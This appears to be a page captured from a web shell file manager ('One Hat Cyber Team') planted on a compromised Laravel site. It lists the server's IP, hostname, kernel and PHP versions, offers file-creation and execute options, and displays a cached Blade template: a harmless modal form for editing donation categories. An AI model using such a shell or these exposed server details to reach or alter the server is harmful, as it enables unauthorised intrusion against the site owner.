⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.184
Server IP:
65.21.180.239
Server:
Linux gowhm.eplangoweb.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
eplangoweb
/
www
/
storage
/
framework
/
views
/
View File Name :
0031f78516eb8f0b5cce0df37a4d3c4f9cab1861.php
<div class="modal fade" id="editModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLongTitle"> <?php echo e(__('Update Donation Category')); ?></h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="ajaxEditForm" class="modal-form" action="<?php echo e(route('user.donation.category.update')); ?>" method="post"> <?php echo csrf_field(); ?> <input type="hidden" name="category_id" id="inid"> <div class="row"> <div class="col-lg-12"> <div class="form-group"> <div class="col-12 mb-2"> <label for="image"><strong><?php echo e(__(' Image') . '*'); ?></strong></label> </div> <div class="col-md-12 mb-3 showImage"> <img src="<?php echo e(asset('assets/admin/img/noimage.jpg')); ?>" alt="..." id="inimage" class="image img-thumbnail img-fluid"> </div> <input type="file" name="image" id="image" class="form-control"> <p class="text-warning mb-0"><?php echo e(__('JPG, PNG, JPEG, SVG images are allowed')); ?> </p> <p class="em text-danger mb-0" id="errimage"></p> </div> </div> </div> <div class="form-group"> <label for=""><?php echo e(__('Icon') . '*'); ?></label> <div class="btn-group d-block"> <button type="button" class="btn btn-primary iconpicker-component"><i class="" id="inicon"></i></button> <button type="button" class="icp1 icp-dd1 btn btn-primary dropdown-toggle" data-selected="fa-car" data-toggle="dropdown"></button> <div class="dropdown-menu"></div> </div> <input type="hidden" id="inputIcon1" name="icon" class="in_icon"> <p id="err_icon" class="mt-1 mb-0 text-danger em"></p> <div class="text-warning mt-2"> <small><?php echo e(__('Click on the dropdown icon to select a icon.')); ?></small> </div> </div> <div class="form-group"> <label for=""><?php echo e(__('Category Name') . '*'); ?></label> <input type="text" id="inname" class="form-control" name="name" placeholder="<?php echo e(__('Enter Category Name')); ?>"> <p id="editErr_name" class="mt-1 mb-0 text-danger em"></p> </div> <div class="form-group"> <label for=""><?php echo e(__('Category Short Description') . '*'); ?></label> <textarea name="short_description" id="inshort_description" class="form-control" placeholder="<?php echo e(__('Enter Category short description')); ?>" rows="3"></textarea> <p id="editErr_short_description" class="mt-1 mb-0 text-danger em"></p> </div> <div class="form-group"> <label for=""><?php echo e(__('Category Status*')); ?></label> <select name="status" id="instatus" class="form-control"> <option disabled><?php echo e(__('Select a Status')); ?></option> <option value="1"><?php echo e(__('Active')); ?></option> <option value="0"><?php echo e(__('Deactive')); ?></option> </select> <p id="editErr_status" class="mt-1 mb-0 text-danger em"></p> </div> <?php if($userBs->theme == 'home_eleven'): ?> <div class="form-group"> <label><?php echo e(__('Featured') . '*'); ?> </label> <div class="selectgroup w-100"> <label class="selectgroup-item"> <input type="radio" name="is_featured" value="1" class="selectgroup-input"> <span class="selectgroup-button"><?php echo e(__('Yes')); ?></span> </label> <label class="selectgroup-item"> <input type="radio" name="is_featured" value="0" class="selectgroup-input"> <span class="selectgroup-button"><?php echo e(__('No')); ?></span> </label> </div> <p id="editErr_is_featured" class="mb-0 text-danger em"></p> </div> <?php endif; ?> <div class="form-group"> <label for=""><?php echo e(__('Category Serial Number') . '*'); ?></label> <input type="number" id="inserial_number" class="form-control " name="serial_number" placeholder="<?php echo e(__('Enter Category Serial Number')); ?>"> <p id="editErr_serial_number" class="mt-1 mb-0 text-danger em"></p> <p class="text-warning mt-2"> <small><?php echo e(__('The higher the serial number is, the later the category will be shown.')); ?></small> </p> </div> </form> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal"> <?php echo e(__('Close')); ?> </button> <button id="updateBtn" type="button" class="btn btn-primary"> <?php echo e(__('Update')); ?> </button> </div> </div> </div> </div> <?php /**PATH /home/eplangoweb/public_html/resources/views/user/donation_management/categories/edit.blade.php ENDPATH**/ ?>